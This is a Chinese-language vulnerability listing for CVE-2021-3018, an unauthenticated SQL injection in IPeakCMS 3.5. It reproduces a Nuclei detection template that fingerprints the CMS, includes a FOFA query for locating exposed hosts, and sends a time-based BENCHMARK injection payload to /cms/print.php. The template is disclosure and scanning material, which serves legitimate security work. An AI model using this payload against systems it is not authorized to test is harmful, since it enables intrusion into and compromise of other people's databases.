CVE-2021-3018: IPeakCMS 3.5 - SQL Injection

日期: 2025-08-01 | 影响软件: IPeakCMS | POC: 已公开

漏洞描述

ipeak Infosystems ibexwebCMS 3.5 contains an unauthenticated Boolean-based SQL injection caused by unsanitized 'id' parameter in /cms/print.php, letting attackers execute arbitrary SQL commands, exploit requires no authentication.

PoC代码[已公开]

id: CVE-2021-3018

info:
  name: IPeakCMS 3.5 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    ipeak Infosystems ibexwebCMS 3.5 contains an unauthenticated Boolean-based SQL injection caused by unsanitized 'id' parameter in /cms/print.php, letting attackers execute arbitrary SQL commands, exploit requires no authentication.
  reference:
    - https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-ipeak-cms-sqli.md
    - https://m4dm0e.github.io/2020/12/07/ipeak-cms-sqli.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3018
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data disclosure, data tampering, or full database compromise.
  remediation: |
    Apply the latest security patches or update to a version that fixes this vulnerability.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-3018
    epss-score: 0.54931
    epss-percentile: 0.97923
    cwe-id: CWE-89
    cpe: cpe:2.3:a:ipeak:ipeakcms:3.5:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 2
    vendor: ipeak
    product: ipeakcms
    fofa-query: body="ipeak" && body="3.5"
  tags: cve,cve2021,ipeakcms,cms,sqli,unauth,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /cms/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "ipeak", "webCMS-3.5")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /cms/print.php?id=1%20AND%207334=BENCHMARK(8000000,MD5(0x73636a72)) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=8'
          - 'status_code == 200'
          - 'contains(body,"onLoad=\"print();\"")'
        condition: and
# digest: 490a0046304402202cf68e46e31ef23c6de01c087f818b9250a15899ba20cd0748ea5f1eab1e7f4602207e0a7ce4ca934f10378ccfa8670912a3eb57045661f1f8bf459d41a36bb493ec:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-3018.yaml